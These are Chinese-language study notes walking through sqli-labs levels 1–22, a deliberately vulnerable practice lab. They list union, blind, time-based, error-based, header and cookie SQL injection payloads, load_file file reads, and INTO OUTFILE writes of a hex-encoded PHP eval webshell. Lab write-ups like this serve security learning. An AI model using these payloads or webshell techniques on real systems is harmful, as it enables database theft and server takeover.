SQLiLab学习笔记less1-22 by L0st

less-1&2

一打开就来了一句"Please input the ID as parameter with numeric value"误导了我。。
真的以为是数字型注入,用id=1 union select..试了半天。后来才发现是字符型注入。
然后用 id=0' union select 1-99#和-- 各种尝试均失败,看writeup发现末尾应该使用 --+ 来注释。

知道了是字符型,那么先看看该sql请求查询了几个字段:
1' order by 1~4 --+
不断尝试直到by 4时页面报错,即查询了三个字段,现在可以开始查询了

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

故MySql常用注释方法:
/ #(即%23) -- /.../ --+

常用函数

  1. version()——MySQL版本
  2. user()——数据库用户名
  3. database()——数据库名
  4. @@datadir——数据库路径
  5. @@version_compile_os——操作系统版本

字符串连接函数:
concat(str1,str2,...)——没有分隔符地连接字符串
concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据

sql中运算优先级and高于or,所以username=’admin’ and password=’’or 1=1
( 假 ) 或 真 = 真
常用SQL查询语句:

show databases查询所有库
use table_name进入库,如use information_schema使用系统数据库
show tables查询库中表
desc table_name查询表结构

查库select schema_name from information_schema.schemata
查此库的表
select table_name from information_schema.tables where table_schema=’xxxxx’
查该表的所有列:
Select column_name from information_schema.columns where table_name=’xxxxx’
查该列数据:
select * from table_name where id=1--+ limit 0,1

本题query
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"

less-3

使用a'b'c'd'e测试是哪种闭合方式,发现返回 near 'b'c'd'e') LIMIT 0,1' at line 1
猜测SQL语句为select * from table where id=('$_GET')
故使用1')来闭合输入
然后依旧需要用--+来注释闭合

本题query
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

less-4:

输入id=1'发现返回正常,输入id=1"返回报错near '"1"") LIMIT 0,1'
故推测查库语句应该为select * where id=("...")

本题query
$id = '"' . $id . '"'; $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";


盲注分为三种:
布尔型,时间性,报错型

常用截取字符串函数:
mid(column_name,start,length)
column_name:要提取的字段名
start:规定开始位置(起始值为1)
length:要返回的字符数,可以留空,则返回剩余文本

substr()
substring()
用法均同mid()

left(string,n) string--要截取的字符串 n--长度
left()得到字符串左边指定个数的字符,即截取前n个字符
例如:left(database(),1)>’a’,查看数据库名第一位

ord()
此函数为返回第一个字符的ASCII码
例如ORD(MID(DATABASE(),1,1))>114
意为检测database()的第一位ASCII码是否大于114,也即是‘r’

ascii()用法如ord(需与subsrt截取函数组合使用)

用例:
substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’
若table_name首字符大于a,则返回真,否则为假

常用的报错注入函数:
extractvalue(1,concat(0x7e,(select @@version),0x7e)) 查询xml
updatexml(1,concat(0x7e,(select @@version),0x7e),1) 修改xml


less-5

使用id=1'后报错,故判断为字符型。但正常页面并不返回数据,故判断为布尔型盲注。
猜测数据库版本号:
id=1' and left(version(),1)=5--+
猜测数据库长度:
id=1' and length(database())>5--+
猜测数据库名第一位:
id=1' and left(version(),1)>'a'--+
猜测数据库第二位:
id=1' and left(version(),2)>'se'--+
猜测库中的表名:
id=1' and ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>101
猜测表中的第一列(使用regexp列(使用regexp,测试users表中的列名是否含有us的列):
id=1' and 1=(select 1 from information_schema.columns
where table_name='users' and column_name regexp '^us[a-z]' limit 0,1) --+
猜测表中的第一列是否含有username:
id=1' and 1=(select 1 from information_schema.columns
where table_name='users' and column_name regexp '^username' limit 0,1) --+
猜测users表的内容:(获取username中的第一行的第一个字符的ascii,与68进行比较,
即为D。而我们从表中得知第一行的数据为Dumb)
id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)
FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+

less-6

使用id=1'无报错,id=0'无报错,猜测不是'闭合,测试id=0 or 1=1--+无果,
id=0' or 1=1--+无果,id=0" or 1=1--+返回正常,推测使用"..."闭合
使用id=1" and 1=2--+返回错误,验证推测。

此类题也可用时间注入:

IF(expression1,expression2,expression3) 如果ex1成立,则执行ex2,否则ex3)
?id=1" and IF(length(database())>8,1,sleep(5)) --+
该语句的作用是如果数据库长度大于8,则立刻返回正常页面,否则延时5秒后返回
BENCHMARK(arg1,arg2) 该函数在MYSQL中用来测试一些函数的执行速度。arg1是执行的次数,arg2是要执行的函数或是表达式。
?id=1" and if(length(database())>7,BENCHMARK(1000000,md5('a')),1) --+
if条件如果为真,则对字符a进行md5编码1000000次,否则立刻返回结果

less-7


Load_file(file_name)函数读取文件并返回该文件的内容作为一个字符串
使用条件:

  1. 必须要权限读取且文件必须完全可读
    and (select count(*) from mysql.user)>0
    如果返回正常,说明有读写权限。
  2. 欲读取文件必须位于服务器上
  3. 必须指定文件完整路径 //可以想办法提交错误的Query让程序报错获得路径
  4. 欲读取文件必须小于 max_allowed_packet

用法:

  1. union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
    “char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的ASCII代码
  2. union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
    “c:/boot.ini”的16进制是“0x633a2f626f6f742e696e69”
  3. union select 1,1,1,load_file(c:\\boot.ini)
    注意:路径里的/用 \\代替

导入到文件
SELECT.....INTO OUTFILE 'file_name'
可以把被选择的行写入一个文件中。该文件被创建到服务器主机上,因此您必须拥有FILE权限,才能使用此语法。file_name不能是一个已经存在的文件。

有两种利用方式:

  1. Select '' into outfile “c:\\phpnow\\htdocs\\test.php” //即直接将select内容导入文件中,但这里需要注意特殊符号被转义
  2. Select version() Into outfile “c:\\phpnow\\htdocs\\test.php” LINES TERMINATED BY 0x16进制文件 //本意是行结尾时要使用Lines terminated by 后面的内容,通常为'/r/n',我们在BY后面添加自己的16进制文件
    可以是一句话或其他任何代码。
Tips
  1. 文件路径注意转义
  2. 如果当前页面无法导出文件,可写入到新文件中读取:
    select load_file(‘c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini’)into outfile ‘c:\\wamp\\www\\test.php’
    即将my.ini导出到test.php,我们访问test.php可看到文件内容

从源代码中可以看到Query为
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
此处依旧可以使用报错注入,但这里我们练习文件导入注入

?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile 'c:\\xampp\\htdocs\\2.php' --+
导出用户名及密码,需知道当前查询表名
有几个需要注意的点,这里联合查询的条件是前面的语句为真,即id=1返回正常,还有就是windows中的'/'换成'\'

?id=1')) union select 1,'',3 into outfile 'c:\\xampp\\htdocs\\new.php' --+

?id=1')) union select 1,version(),3 into outfile 'c:\\xampp\\htdocs\\new.php' LINES TERMINATED BY 0x3c3f70687020406576616c28245f504f53545b22737963225d293f3e --+
两种语句均是同样的效果,写入一句话成功后直接用菜刀连接即可

less-8

同less-5,使用布尔或延时注入方法

less-9

通过简单测试可以发现,无论输入查询的数据正确与否,页面内容不会随之改变,故考虑使用延时注入
?id=1' and if(substr(user(),1,1)>'a',sleep(5),1) --+
延时注入完整流程
猜测数据库:

?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+,1,1))=116,1,sleep(5))--+)

说明第一位是s (ascii码是115)

?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

说明第一位是e (ascii码是101)

....

以此类推,我们知道了数据库名字是security

猜测security的数据表:

?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

猜测第一个数据表的第一位是e,...依次类推,得到emails

?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+

猜测第二个数据表的第一位是r,...依次类推,得到referers

...

再以此类推,我们可以得到所有的数据表emails,referers,uagents,users

猜测users表的列:

?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+

猜测users表的第一个列的第一个字符是i,

以此类推,我们得到列名是id,username,password

猜测username的值:

?id=1'and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+

猜测username的第一行的第一位

以此类推,我们得到数据库username,password的所有内容

less-10

?id=1" and if(left(user(),1)='r',sleep(5),1) --+
除使用双引号闭合id外,与less-9无异

less-11

该题使用POST方法提交参数,看下Query语句
$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

先来试试万能密码:

username:'or 1=1 limit 1,1 #
password: whatever....
改变limit后面的数字为 2,1 3,1 4,1既可查询不同用户的密码

联合查询

username=admin' order by 1 # 替换 1 为2,3,4...直到报错为止,既可知道查询的字段数

username=0' union select 1,2 # 显示字段显示的位置

username=0' union select user(),version() # 剩下的步骤与GET型无异

less-12

先测试一下Query语句中如何闭合一个参数的输入
username=a'a"a')aa
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'a')aa") and password=("da") LIMIT 0,1' at line 1
可以看出应使用 ") 来闭合
剩下与less-11无异

less-13

源码中的Query请求:
$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
同样构造:
username=admin') #
password=随便输
显示登陆正常,但不会返回任何数据,这里要结合盲注技术:
admin') union select 1,'' into outfile 'c:\\xampp\\htdocs\\1.php' #
直接上菜刀就行

less-14

闭合参数的方法为 "$id" ,其余同less-13

less-15

先测试一下参数是如何闭合的,多试几次就发现uname=1' or 1=1 # 可以成功登陆,
说明参数以 '$id' 方式闭合,然后开始造轮子:
1' or 1=1 and length(user())>10 #
或者延时注入:
1' or 1=1 and if(length(user())>5,benchmark(1000000,md5('a')),1) #
接下来就是盲注的过程,参考前文.

less-16

除闭合方式变为 ("$id") 外,与less-15无异

less-17


SQL中对于数据的查询,增减与修改:

查询

select * from users where id=1;

增加

insert into users values('16','cat','cat'); 直接增加一行数据至users表

删除
  1. 删除数据
    delete from table_name;
    delete from table_name where id=1; 删除指定条件的数据
  2. 删除结构
    drop database database_name; 删库
    drop table table_name; 删表
    alter table table_name drop column column_name; 删除表中的列
  3. 修改
    update table_name set column_name='new_value'; 修改所有列的数据
    update table_name set column_name='new_value' where id=1; 指定条件修改

先来看下源码中程序是如何修改用户密码的:

$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$row=mysql_query($sql);
$row1=$row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

因为程序对username做了严格过滤,故只有password处存在注入:
构造payload:
New Password=
123' and if(length(user())>10,1,benchmark(1111111,md5('a'))) #
剩下就是延时注入的套路了。

less-18

先看源码:

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";`

$insert="INSERT INTO security.uagents (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";`

这里我们在HTTP请求中User_Agent处利用报错注入:
'and updatexml(1,(select @@version),1) and '1'='1 查询mysql版本

'and extractvalue(1,concat(0x7e,(select @@version),0x7e,(select user()),0x7e)) and '1'='1
'and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1))) and '1'='1 查询库名

less-19

与less-18无异,只是将注入点换成了HTTP请求头的Referer

less-20

先看一个函数setcookie():
setcookie(name,value,expire,path,domain,secure)
然后看关键的几处源码:

生成cookie:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];

setcookie('uname', $cookee, time()+3600);

设置cookie后:
$cookee = $_COOKIE['uname'];
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
    {
        die('Issue with your mysql: ' . mysql_error());
    }

可以看到,在成功登陆后服务端会生成一段cookie,然后客户端请求页面(刷新)时会带上设置的cookie,程序会读取cookie中的uname数据,并且将其带入数据库查询,故我们需在uname处构造payload:
uname=admin' and updatexml(1,(select user()),1) #

less-21

查看源码发现大部分与less-20相同,只是多了:

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);     //对$cookee进行了一次BASE64解码
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
//注意,此处闭合参数需要用')

那么我们将payload进行一次BASE64编码:

编码前:da') and updatexml(1,(select @@version),1) #
编码后:ZGEnKSBhbmQgdXBkYXRleG1sKDEsKHNlbGVjdCBAQHZlcnNpb24pLDEpICM=

然后在cookie中发送:
uname=ZGEnKSBhbmQgdXBkYXRleG1sKDEsKHNlbGVjdCBAQHZlcnNpb24pLDEpICM=
即可返回数据库版本

less-22

与less-21差不多,也只是多了:
$cookee1 = '"'. $cookee. '"';
造轮子时需要用双引号闭合。

你可能感兴趣的:(SQLiLab学习笔记less1-22 by L0st)